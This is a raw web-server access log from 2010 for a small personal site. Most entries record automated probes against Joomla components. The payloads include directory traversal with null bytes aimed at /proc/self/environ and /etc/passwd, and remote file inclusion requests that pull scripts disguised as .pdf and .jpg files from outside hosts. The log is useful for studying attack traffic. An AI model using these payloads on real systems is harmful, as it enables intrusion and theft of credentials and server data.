207.46.199.44 - - [26/Jun/2010:19:02:10 -0500] "GET /logs/access_log.1236384000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.64.99 - - [26/Jun/2010:19:05:35 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:05:50 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:12:18 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:12:19 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:12:19 -0500] "GET /logs/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:12:33 -0500] "GET /logs/access_log.1274832000/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:12:33 -0500] "GET /?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:12:34 -0500] "GET /logs/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:13:41 -0500] "GET /logs/access_log.1275004800/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:13:55 -0500] "GET /logs/access_log.1275004800/?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:14:54 -0500] "GET /logs/access_log.1274400000/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:14:55 -0500] "GET /logs/access_log.1274400000/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:14:55 -0500] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:14:55 -0500] "GET /?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:14:55 -0500] "GET /logs/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:14:55 -0500] "GET /logs/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:16:28 -0500] "GET /logs/access_log.1275696000/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.64.99 - - [26/Jun/2010:19:16:29 -0500] "GET /logs/access_log.1275696000/?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
188.40.246.135 - - [26/Jun/2010:19:22:51 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
188.40.246.135 - - [26/Jun/2010:19:22:52 -0500] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
99.188.49.167 - - [26/Jun/2010:19:25:08 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [26/Jun/2010:19:25:09 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [26/Jun/2010:19:25:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [26/Jun/2010:19:25:12 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
207.46.199.183 - - [26/Jun/2010:19:29:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [26/Jun/2010:19:29:02 -0500] "GET /logs/access_log.1165795200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [26/Jun/2010:19:33:37 -0500] "GET /logs/access_log.1182211200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.254.120.112 - - [26/Jun/2010:19:37:33 -0500] "GET /logs/access_log.1266710400//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 339 "-""libwww-perl/5.831"
80.254.120.112 - - [26/Jun/2010:19:37:50 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 317 "-""libwww-perl/5.831"
206.210.68.43 - - [26/Jun/2010:19:42:05 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=63&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
206.210.68.43 - - [26/Jun/2010:19:42:06 -0500] "GET /?option=com_myblog&Itemid=63&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
206.210.68.43 - - [26/Jun/2010:19:42:06 -0500] "GET /logs/?option=com_myblog&Itemid=63&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11106 "-""libwww-perl/5.808"
72.30.142.216 - - [26/Jun/2010:19:44:18 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.188 - - [26/Jun/2010:19:50:11 -0500] "GET /logs/access_log.1255219200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.71.144 - - [26/Jun/2010:19:54:00 -0500] "GET /logs/access_log.1271980800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.200.170.145 - - [26/Jun/2010:19:55:51 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:19:55:58 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:19:56:11 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:19:56:17 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:19:56:34 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:19:56:47 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:19:58:05 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
86.109.111.120 - - [26/Jun/2010:19:58:18 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.206.204.16 - - [26/Jun/2010:19:58:19 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:19:59:37 -0500] "GET ///*?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 287 "-""libwww-perl/5.805"
86.109.111.120 - - [26/Jun/2010:20:00:16 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.206.204.16 - - [26/Jun/2010:20:00:18 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
86.109.111.120 - - [26/Jun/2010:20:00:53 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.206.204.16 - - [26/Jun/2010:20:04:29 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.206.204.16 - - [26/Jun/2010:20:04:30 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.206.204.16 - - [26/Jun/2010:20:04:30 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.206.204.16 - - [26/Jun/2010:20:08:56 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:09:54 -0500] "GET //*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:10:17 -0500] "GET //*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
67.195.112.180 - - [26/Jun/2010:20:16:40 -0500] "GET /artwork/ HTTP/1.0" 200 11078 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [26/Jun/2010:20:17:41 -0500] "GET /logs/access_log.1182038400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.2.112 - - [26/Jun/2010:20:19:49 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
91.121.21.189 - - [26/Jun/2010:20:19:54 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
178.63.9.134 - - [26/Jun/2010:20:20:02 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
67.15.198.39 - - [26/Jun/2010:20:20:03 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
78.41.233.128 - - [26/Jun/2010:20:20:05 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
94.247.176.194 - - [26/Jun/2010:20:20:10 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
216.38.49.38 - - [26/Jun/2010:20:20:19 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
89.200.170.145 - - [26/Jun/2010:20:22:16 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:22:16 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:22:16 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
195.225.170.108 - - [26/Jun/2010:20:24:30 -0500] "GET /logs/*.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:24:32 -0500] "GET /*.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:24:32 -0500] "GET /logs/*.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:24:32 -0500] "GET /*.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
207.46.199.37 - - [26/Jun/2010:20:25:11 -0500] "GET /costume/thmb9.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.225.170.108 - - [26/Jun/2010:20:25:35 -0500] "GET //*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:25:47 -0500] "GET //*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
91.121.21.189 - - [26/Jun/2010:20:26:24 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
91.121.21.189 - - [26/Jun/2010:20:26:24 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
91.121.21.189 - - [26/Jun/2010:20:26:24 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.803"
78.41.233.128 - - [26/Jun/2010:20:26:24 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:20:26:25 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:20:26:25 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.200.170.145 - - [26/Jun/2010:20:26:32 -0500] "GET /logs/access_log.1276128000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
94.247.176.194 - - [26/Jun/2010:20:26:48 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
94.247.176.194 - - [26/Jun/2010:20:26:48 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
94.247.176.194 - - [26/Jun/2010:20:26:48 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
178.63.9.134 - - [26/Jun/2010:20:27:35 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
178.63.9.134 - - [26/Jun/2010:20:27:35 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
178.63.9.134 - - [26/Jun/2010:20:27:35 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
216.38.49.38 - - [26/Jun/2010:20:28:48 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
216.38.49.38 - - [26/Jun/2010:20:28:50 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.38.49.38 - - [26/Jun/2010:20:28:51 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
67.15.198.39 - - [26/Jun/2010:20:29:20 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
67.15.198.39 - - [26/Jun/2010:20:29:20 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
67.15.198.39 - - [26/Jun/2010:20:29:20 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
89.200.170.145 - - [26/Jun/2010:20:29:21 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:29:21 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:29:21 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
86.109.111.120 - - [26/Jun/2010:20:29:25 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.206.204.16 - - [26/Jun/2010:20:29:34 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.170.145 - - [26/Jun/2010:20:30:45 -0500] "GET /logs/access_log.1275696000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:30:46 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:30:47 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
78.41.233.128 - - [26/Jun/2010:20:31:03 -0500] "GET /logs/access_log.1276128000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
94.247.176.194 - - [26/Jun/2010:20:31:11 -0500] "GET /logs/access_log.1276128000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
89.200.170.145 - - [26/Jun/2010:20:31:21 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:31:21 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:31:21 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:31:37 -0500] "GET /logs/access_log.1276128000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:31:37 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:31:37 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:31:38 -0500] "GET /logs/access_log.1276214400///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
91.121.21.189 - - [26/Jun/2010:20:31:45 -0500] "GET /logs/access_log.1276128000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
89.200.170.145 - - [26/Jun/2010:20:31:54 -0500] "GET /logs/access_log.1276214400///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
86.109.111.120 - - [26/Jun/2010:20:31:57 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.206.204.16 - - [26/Jun/2010:20:31:59 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.204.184 - - [26/Jun/2010:20:32:11 -0500] "GET /logs/access_log.1188172800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
178.63.9.134 - - [26/Jun/2010:20:32:31 -0500] "GET /logs/access_log.1276128000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
216.38.49.38 - - [26/Jun/2010:20:33:49 -0500] "GET /logs/access_log.1276128000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
195.225.170.108 - - [26/Jun/2010:20:34:16 -0500] "GET /*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.805"
67.15.198.39 - - [26/Jun/2010:20:35:31 -0500] "GET /logs/access_log.1276128000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
89.200.170.145 - - [26/Jun/2010:20:36:27 -0500] "GET /logs/access_log.1274832000///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:36:27 -0500] "GET ///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
89.200.170.145 - - [26/Jun/2010:20:36:27 -0500] "GET /logs///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
207.46.195.232 - - [26/Jun/2010:20:36:40 -0500] "GET /logs/access_log.1245542400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.206.204.16 - - [26/Jun/2010:20:36:50 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
86.109.111.120 - - [26/Jun/2010:20:36:55 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
195.225.170.108 - - [26/Jun/2010:20:37:02 -0500] "GET /logs/access_log.1274832000//*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:37:02 -0500] "GET //*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.805"
195.225.170.108 - - [26/Jun/2010:20:37:03 -0500] "GET /logs//*?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.805"
89.200.170.145 - - [26/Jun/2010:20:37:48 -0500] "GET /logs/access_log.1276214400///index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
74.55.41.132 - - [26/Jun/2010:20:38:16 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.41.132 - - [26/Jun/2010:20:38:23 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.41.132 - - [26/Jun/2010:20:38:55 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
85.19.150.100 - - [26/Jun/2010:20:39:36 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
74.55.41.132 - - [26/Jun/2010:20:39:40 -0500] "GET /logs/access_log.1275782400//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.55.41.132 - - [26/Jun/2010:20:39:40 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
